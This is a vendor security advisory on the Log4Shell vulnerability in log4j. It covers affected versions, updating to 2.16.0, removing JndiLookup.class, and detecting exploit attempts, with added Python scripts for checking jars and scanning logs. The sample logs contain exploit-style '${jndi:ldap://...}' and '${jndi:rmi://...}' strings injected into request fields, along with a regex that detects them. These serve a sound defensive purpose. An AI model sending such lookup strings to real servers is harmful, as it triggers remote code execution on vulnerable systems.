Security Advisory Regarding Log4Shell
Summary
On December 9, a Remote Code Execution (RCE) vulnerability was disclosed in the Java logging library log4j and assigned CVE-2021-44228. The RCE is triggered when a Java-based application logs the exploit string; the string points at a remote payload, which the application then fetches and executes. This vulnerability leaves any server hosting an unpatched Java application open to exploitation.
The Log4j project released version 2.15.0 on Dec 09, 2021 to fix the vulnerability.
Details
The vulnerability affects Log4j versions 1.0 to 2.14.1. If you are running any Java application that uses the affected log4j libraries and that accepts and logs user input, prioritize applying the update. For enterprise customers, this means Java-based web applications, and perhaps even network or security appliances that integrate Java as part of their operations. Java’s famous tagline is that it runs on billions of devices. Apache Struts appears to be affected, but some versions of the JDK were not affected because they already ship with protections in place.
LunaSec has a more detailed write-up on the vulnerability and exploit.
Please note that log4j 2.12.1 was the last release of log4j that supported Java 7 and that patching this vulnerability may require updating the JVM to Java 8.
Mitigations
Update all log4j versions to 2.16.0, as an additional Remote Code Execution vulnerability (CVE-2021-45046) was discovered in version 2.15.0. If you are unable to update, you can “remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class” (https://logging.apache.org/log4j/2.x/security.html).
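The following script is an added example (not part of this advisory or of the Log4j project) that does in Python what the zip command above does, and adds the check a defender wants afterwards: which version a log4j-core jar reports, whether it still contains JndiLookup.class, and whether that combination still needs action. It assumes the jar's META-INF/MANIFEST.MF carries an Implementation-Version header and falls back to the file name otherwise; the jar it builds for the demo is a constructed stand-in, not a real log4j artifact.

```python
"""Inspect log4j-core jars for JndiLookup.class and optionally strip it.

Added example, not the advisory's or the Log4j project's code. Mirrors
`zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`
and verifies the result. Removing the class is a stopgap; updating is the fix.
"""
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
PATCHED_MIN = (2, 16, 0)  # minimum release recommended by the advisory


def parse_version(text):
    """Turn '2.14.1' (anywhere in text) into (2, 14, 1); None if absent."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text or "")
    return tuple(int(x) for x in m.groups()) if m else None


def jar_version(jar):
    """Best-effort version: manifest Implementation-Version, else the file name.
    Assumption: the manifest carries Implementation-Version (labelled assumption)."""
    with zipfile.ZipFile(jar) as z:
        try:
            manifest = z.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        except KeyError:
            manifest = ""
    for line in manifest.splitlines():
        if line.lower().startswith("implementation-version:"):
            v = parse_version(line.split(":", 1)[1])
            if v:
                return v
    return parse_version(os.path.basename(jar))


def inspect_jar(jar):
    """Report version, presence of JndiLookup.class, and whether action is still needed.
    A 2.16.0+ jar may still contain the class; only pre-2.16.0 jars with it are flagged."""
    with zipfile.ZipFile(jar) as z:
        has_class = JNDI_LOOKUP in z.namelist()
    version = jar_version(jar)
    needs_action = has_class and (version is None or version < PATCHED_MIN)
    return {"version": version, "has_jndi_lookup": has_class, "needs_action": needs_action}


def remove_jndi_lookup(jar):
    """Rewrite the jar without JndiLookup.class (same effect as the zip -d command)."""
    tmp = jar + ".tmp"
    with zipfile.ZipFile(jar) as src, zipfile.ZipFile(tmp, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            if item.filename != JNDI_LOOKUP:
                dst.writestr(item, src.read(item.filename))
    os.replace(tmp, jar)


def make_sample_jar(directory, version="2.14.1"):
    """Constructed stand-in for a vulnerable log4j-core jar (placeholder bytes, not real bytecode)."""
    path = os.path.join(directory, f"log4j-core-{version}.jar")
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        z.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
        z.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
    return path


def demo():
    """Build the sample jar, inspect it, strip the class, inspect again."""
    with tempfile.TemporaryDirectory() as d:
        jar = make_sample_jar(d)
        before = inspect_jar(jar)
        remove_jndi_lookup(jar)
        after = inspect_jar(jar)
        return before, after


if __name__ == "__main__":
    b, a = demo()
    print("before:", b)
    print("after: ", a)
```

Point inspect_jar at each log4j-core jar found on a host (for example via find / -name 'log4j-core-*.jar') to build an inventory; only call remove_jndi_lookup where updating to 2.16.0 is genuinely not possible, and re-run inspect_jar afterwards to confirm the class is gone.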
Detection
To detect exploit attempts, search web logs for the string “${jndi:”. Any match should be followed by a payload reference (the address the lookup points to). If outbound traffic to that payload address was allowed, fully investigate the server to determine what was executed.
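The script below is an added example (not from this advisory) of the detection step just described: it scans web access log lines for the “${jndi:” indicator, extracts the lookup scheme and the payload address that follows it, and then checks the extracted host against egress firewall records to separate a probe that was merely logged from one whose payload the server was allowed to reach. Both log samples are constructed for the example and use documentation address ranges; the log formats and field positions are assumptions.

```python
"""Find Log4Shell probe strings in web logs and correlate them with egress logs.

Added example, not the advisory's code. Sample lines are constructed
(documentation ranges 192.0.2.0/24 and 198.51.100.0/24) in Apache combined
format and a simple "ALLOW/DENY" firewall format; both are assumptions.
"""
import re

# The advisory's indicator: the literal lookup prefix "${jndi:", followed by a
# scheme (ldap, rmi, dns, ...) and the address the lookup points to.
PROBE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+):/*(?P<target>[^}\s\"']*)", re.IGNORECASE
)

# Constructed Apache combined-format access log lines.
SAMPLE_ACCESS_LOG = [
    '192.0.2.10 - - [10/Dec/2021:10:12:01 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [10/Dec/2021:10:12:05 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://192.0.2.50:1389/a}"',
    '192.0.2.12 - - [10/Dec/2021:10:12:09 +0000] "GET /?q=${jndi:rmi://198.51.100.7:1099/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]

# Constructed egress firewall lines: connections the application server attempted.
SAMPLE_EGRESS_LOG = [
    "2021-12-10T10:12:06Z ALLOW tcp 10.0.0.5:49152 -> 192.0.2.50:1389",
    "2021-12-10T10:12:10Z DENY  tcp 10.0.0.5:49153 -> 198.51.100.7:1099",
]


def find_jndi_probes(lines):
    """Return one record per line containing the "${jndi:" indicator.

    The first field of each line is taken as the client address (assumption:
    Apache combined format). A line that merely contains the word "jndi"
    without the "${jndi:" lookup syntax is not a hit.
    """
    hits = []
    for line_no, line in enumerate(lines, start=1):
        m = PROBE.search(line)
        if not m:
            continue
        target = m.group("target")
        # Host is everything before the first ':' (port) or '/' (path).
        host = re.split(r"[:/]", target, maxsplit=1)[0]
        hits.append({
            "line_no": line_no,
            "client": line.split(" ", 1)[0],
            "scheme": m.group("scheme").lower(),
            "target": target,
            "host": host,
        })
    return hits


def egress_allowed(hits, egress_lines):
    """Mark each hit with whether an ALLOW record exists for the payload host.

    An allowed connection is the advisory's trigger for a full investigation
    of the server; a DENY record or no record means the payload was not
    fetched through the logged path. Hostname targets would need resolving
    to compare against address-only firewall logs.
    """
    allowed = [l for l in egress_lines if " ALLOW " in l]
    for h in hits:
        h["egress_allowed"] = any(h["host"] in l for l in allowed)
    return hits


def scan(access_lines, egress_lines):
    """Full pipeline: detect probes, then correlate them with egress records."""
    return egress_allowed(find_jndi_probes(access_lines), egress_lines)


if __name__ == "__main__":
    for hit in scan(SAMPLE_ACCESS_LOG, SAMPLE_EGRESS_LOG):
        status = "INVESTIGATE" if hit["egress_allowed"] else "blocked/not seen"
        print(f"line {hit['line_no']}: {hit['client']} -> {hit['scheme']}://{hit['target']} [{status}]")
```

Feed scan() real access and firewall logs by reading them line by line; the records whose egress_allowed is True are the servers the advisory says to investigate first, while the others still identify which clients are probing.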
GreyNoise has added tags to their service to identify web scanners probing for the vulnerability:
Web Scanners scanning with the user agent “jndi:ldap”
Web Scanners tagged with log4j
Additional Resources
Proof of concept exploits for this vulnerability as well as detailed write-ups are currently available below:
About Hurricane Labs
Hurricane Labs is a dynamic Managed Services Provider that unlocks the potential of Splunk and security for diverse enterprises across the United States. With a dedicated, Splunk-focused team and an emphasis on humanity and collaboration, we provide the skills, resources, and results to help make our customers’ lives easier.
For more information, visit www.hurricanelabs.com and follow us on Twitter @hurricanelabs.
